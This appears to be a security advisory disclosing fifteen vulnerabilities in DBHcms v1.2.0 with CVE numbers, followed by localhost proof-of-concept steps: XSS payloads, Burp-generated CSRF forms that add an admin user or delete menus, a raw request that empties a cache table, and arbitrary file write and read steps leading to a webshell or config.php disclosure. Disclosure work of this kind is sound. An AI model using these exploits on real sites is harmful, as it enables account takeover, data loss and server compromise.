DBHcms v1.2.0 multiple Vulnerability
Test environment
Download Page:
http://down.admin5.com/php/139227.html
https://github.com/ksbunk/dbhcms/releases/tag/dbhcms-1.2.0
windows 10 + php 5.4.31 + Apache2.2 + DBHcms v1.2.0
Descriptions
[1]
DBHcms v1.2.0 has a directory traversal vulnerability cause there has no directory control function in directory /dbhcms/. A remote unauthenticated attacker can exploit this vulnerability to obtain server-sensitive information.
[2]
DBHcms v1.2.0 has a sensitive information leaks vulnerability cause there has no security access control in /dbhcms/ext/news/ext.news.be.php, A remote unauthenticated attacker can exploit this vulnerability to get path information.
[3]
DBHcms v1.2.0 has a stored xss vulnerability cause there has no security filter of $_GET['dbhcms_pid'] variable in dbhcms\page.php line 107, A remote unauthenticated attacker can exploit this vulnerability to hijacking other users.
[4]
DBHcms v1.2.0 has a stored xss vulnerability cause there has no htmlspecialchars function form 'Name' in dbhcms\types.php, A remote unauthenticated attacker can exploit this vulnerability to hijacking other users.
[5]
DBHcms v1.2.0 has a stored xss vulnerability cause there has no security filter in dbhcms\mod\mod.users.view.php line 57 for user_login, A remote authenticated with admin user can exploit this vulnerability to hijacking other users.
[6]
DBHcms v1.2.0 has a reflected xss vulnerability cause there has no security filter in dbhcms\mod\mod.selector.php line 108 for $_GET['return_name'] parameter, A remote authenticated with admin user can exploit this vulnerability to hijacking other users.
[7]
DBHcms v1.2.0 has a stored xss vulnerability cause there has no htmlspecialchars function for 'menu_description' variable in dbhcms\mod\mod.menus.edit.php line 83 and in dbhcms\mod\mod.menus.view.php line 111, A remote authenticated with admin user can exploit this vulnerability to hijacking other users.
[8]
DBHcms v1.2.0 has a stored xss vulnerability cause there has no htmlspecialchars function in dbhcms\mod\mod.domain.edit.php line 119, A remote authenticated with admin user can exploit this vulnerability to hijacking other users.
[9]
DBHcms v1.2.0 has a stored xss vulnerability cause there has no htmlspecialchars function for '$_POST['pageparam_insert_name']' variable in dbhcms\mod\mod.page.edit.php line 227, A remote authenticated with admin user can exploit this vulnerability to hijacking other users.
[10]
DBHcms v1.2.0 has a stored xss vulnerability cause there has no htmlspecialchars function for '$_POST['pageparam_insert_description']' variable in dbhcms\mod\mod.page.edit.php line 227, A remote authenticated with admin user can exploit this vulnerability to hijacking other users.
[11]
DBHcms v1.2.0 has a csrf vulnerability cause there has no csrf protection mechanism,as demonstrated by csrf for an index.php?dbhcms_pid=-70 can add a user.
[12]
DBHcms v1.2.0 has a csrf vulnerability cause there has no csrf protection mechanism,as demonstrated by csrf for an /index.php?dbhcms_pid=-80&deletemenu=9 can delete any menu.
[13]
DBHcms v1.2.0 has an unauthorized operation vulnerability cause There's no access control at line 175 of dbhcms\page.php for empty cache operation.A remote unauthenticated can exploit this vulnerability to empty a table.
[14]
DBHcms v1.2.0 has a Arbitrary file write vulnerability cause in dbhcms\mod\mod.editor.php $_POST['updatefile'] is filename and $_POST['tinymce_content'] is file content,and there has no filter function for security, you can write any filename with any content. A remote authenticated with admin user can exploit this vulnerability to get a webshell.
[15]
DBHcms v1.2.0 has an Arbitrary file read vulnerability cause in dbhcms\mod\mod.editor.php $_GET['file'] is filename,and there has no filter function for security, you can read any file's content. A remote authenticated with admin user can exploit this vulnerability to read all web source code.
cve number
CVE-2020-19877
DBHcms v1.2.0 has a directory traversal vulnerability as there is no directory control function in directory /dbhcms/. A remote unauthenticated attacker can exploit this vulnerability to obtain server-sensitive information.
CVE-2020-19878
DBHcms v1.2.0 has a sensitive information leaks vulnerability as there is no security access control in /dbhcms/ext/news/ext.news.be.php, A remote unauthenticated attacker can exploit this vulnerability to get path information.
CVE-2020-19879
DBHcms v1.2.0 has a stored xss vulnerability as there is no security filter of $_GET['dbhcms_pid'] variable in dbhcms\page.php line 107.
CVE-2020-19880
DBHcms v1.2.0 has a stored xss vulnerability as there is no htmlspecialchars function form 'Name' in dbhcms\types.php, A remote unauthenticated attacker can exploit this vulnerability to hijack other users.
CVE-2020-19881
DBHcms v1.2.0 has a reflected xss vulnerability as there is no security filter in dbhcms\mod\mod.selector.php line 108 for $_GET['return_name'] parameter, A remote authenticated with admin user can exploit this vulnerability to hijack other users.
CVE-2020-19882
DBHcms v1.2.0 has a stored xss vulnerability as there is no htmlspecialchars function for 'menu_description' variable in dbhcms\mod\mod.menus.edit.php line 83 and in dbhcms\mod\mod.menus.view.php line 111, A remote authenticated with admin user can exploit this vulnerability to hijack other users.
CVE-2020-19883
DBHcms v1.2.0 has a stored xss vulnerability as there is no security filter in dbhcms\mod\mod.users.view.php line 57 for user_login, A remote authenticated with admin user can exploit this vulnerability to hijack other users.
CVE-2020-19884
DBHcms v1.2.0 has a stored xss vulnerability as there is no htmlspecialchars function in dbhcms\mod\mod.domain.edit.php line 119.
CVE-2020-19885
DBHcms v1.2.0 has a stored xss vulnerability as there is no htmlspecialchars function for '$_POST['pageparam_insert_name']' variable in dbhcms\mod\mod.page.edit.php line 227, A remote authenticated with admin user can exploit this vulnerability to hijack other users.
CVE-2020-19886
DBHcms v1.2.0 has no CSRF protection mechanism,as demonstrated by CSRF for an /index.php?dbhcms_pid=-80&deletemenu=9 can delete any menu.
CVE-2020-19887
DBHcms v1.2.0 has a stored XSS vulnerability as there is no htmlspecialchars function for '$_POST['pageparam_insert_description']' variable in dbhcms\mod\mod.page.edit.php line 227, A remote authenticated with admin user can exploit this vulnerability to hijack other users.
CVE-2020-19888
DBHcms v1.2.0 has an unauthorized operation vulnerability because there's no access control at line 175 of dbhcms\page.php for empty cache operation. This vulnerability can be exploited to empty a table.
CVE-2020-19889
DBHcms v1.2.0 has no CSRF protection mechanism,as demonstrated by CSRF for index.php?dbhcms_pid=-70 can add a user.
CVE-2020-19890
DBHcms v1.2.0 has an Arbitrary file read vulnerability in dbhcms\mod\mod.editor.php $_GET['file'] is filename,and as there is no filter function for security, you can read any file's content.
CVE-2020-19891
DBHcms v1.2.0 has an Arbitrary file write vulnerability in dbhcms\mod\mod.editor.php $_POST['updatefile'] is filename and $_POST['tinymce_content'] is file content, there is no filter function for security. A remote authenticated admin user can exploit this vulnerability to get a webshell.
[1]
just visit http://localhost:8089/dbhcms/
[2]
in /dbhcms/ext/news/ext.news.be.php, there has no security access control.
just visit http://localhost:8089/dbhcms/ext/news/ext.news.be.php
[3]
there has no security filter of $_GET['dbhcms_pid'] variable in dbhcms\page.php line 107.
in dbhcms\func.php line 182 dbhcms_pid will stored in database and no security filter before.
visit http://localhost:8089/?dbhcms_params=2&dbhcms_pid=2222<img/src/onerror=alert(1)>
then, when authenticated admin user access to http://localhost:8089/index.php?dbhcms_pid=-110
[4]
in dbhcms\types.php there has no htmlspecialchars function for 'Name'.
visit http://localhost:8089/index.php?dbhcms_did=1&dbhcms_pid=8&dbhcms_lang=en
at Name: parameter filled 2<img/src/onerror=alert(1)>
[5]
there has no security filter in dbhcms\mod\mod.users.view.php line 57 for user_login.
first login as admin user, then visit http://localhost:8089/index.php?dbhcms_pid=-71
at User : parameter filled <img/src/onerror=alert(22)>
[6]
there has no security filter in dbhcms\mod\mod.selector.php line 108 for $_GET['return_name'] parameter .
first login as admin user, then visit http://localhost:8089/index.php?dbhcms_pid=-8&data_type=DT_USER&return_name=2222');"></a><script>alert(1)</script>//'
[7]
there has no htmlspecialchars function for 'menu_description' variable in dbhcms\mod\mod.menus.edit.php line 83 and in dbhcms\mod\mod.menus.view.php line 111.
first login as admin user, then visit http://localhost:8089/index.php?dbhcms_pid=-81
at Description : parameter filled <img/src/onerror=alert(234)>
then visit http://localhost:8089/index.php?dbhcms_pid=-80
[8]
there has no htmlspecialchars function in dbhcms\mod\mod.domain.edit.php line 119
first login as admin user, then visit http://localhost:8089/index.php?dbhcms_pid=-21
at Description parameter filled <img/src/onerror=alert(231)>
[9]
there has no htmlspecialchars function for '$_POST['pageparam_insert_name']' variable in dbhcms\mod\mod.page.edit.php line 227
first login as admin user, then visit http://localhost:8089/index.php?dbhcms_pid=-12
at Parameter: parameter filled 33'<img/src/onerror=alert(13)>
[10]
there has no htmlspecialchars function for '$_POST['pageparam_insert_description']' variable in dbhcms\mod\mod.page.edit.php line 227
first login as admin user, then visit http://localhost:8089/index.php?dbhcms_pid=-12
at Description: parameter filled 33"><img/src/onerror=alert(43)>//
[11]
first login as admin user, then visit http://ip:port/csrf.html and click Submit request
csrf.html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8089/index.php?dbhcms_pid=-70" method="POST">
<input type="hidden" name="dbhcms_save_user" value="new" />
<input type="hidden" name="user_login_hidden" value="" />
<input type="hidden" name="user_login" value="aaaa" />
<input type="hidden" name="user_passwd" value="aaaa" />
<input type="hidden" name="user_name" value="aaaa" />
<input type="hidden" name="user_sex" value="ST_FEMALE" />
<input type="hidden" name="user_company" value="aaaa" />
<input type="hidden" name="user_location" value="aaaa" />
<input type="hidden" name="user_email" value="asd@qq.com" />
<input type="hidden" name="user_website" value="http://123.com" />
<input type="hidden" name="user_lang" value="en" />
<input type="hidden" name="user_domains" value="1" />
<input type="hidden" name="user_level" value="A" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
[12]
first login as admin user, then visit http://ip:port/csrf.html and click Submit request
Warning: you should add some menu for this test by visit http://localhost:8089/index.php?dbhcms_pid=-81 and deletemenu's value is unstable.
csrf.html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8089/index.php">
<input type="hidden" name="dbhcms_pid" value="-80" />
<input type="hidden" name="deletemenu" value="9" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
[13]
first login as admin user, then visit http://localhost:8089/index.php?dbhcms_pid=-30 to enable cacheEnabled,then logout for unprivliged operate test.
There's no access control at line 175 of dbhcms\page.php for cache empty operate.
you can empty the table named xxx_cms_cache by requesting the following:
POST /index.php?dbhcms_pid=9999999999&dbhcms_params=32333 HTTP/1.1
Host: localhost:8089
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Connection: close
Referer: http://localhost:8089/index.php?dbhcms_pid=9999999999&dbhcms_params=3333
Upgrade-Insecure-Requests: 1
dbhcmsCache=CT_EMPTYALL
[14]
in dbhcms\mod\mod.editor.php $_POST['updatefile'] is filename and $_POST['tinymce_content'] is file content,and there has no filter function for security, you can write any filename with any content.
first login as admin user, then visit http://localhost:8089/index.php?dbhcms_pid=-6 POST updatefile=123.php&tinymce_content=
then visit http://localhost:8089/123.php
[15]
in dbhcms\mod\mod.editor.php $_GET['file'] is filename,and there has no filter function for security, you can read any file's content.
first login as admin user, then visit http://localhost:8089/index.php?dbhcms_pid=-6
view-source:http://localhost:8089/index.php?dbhcms_pid=-6&file=config.php


































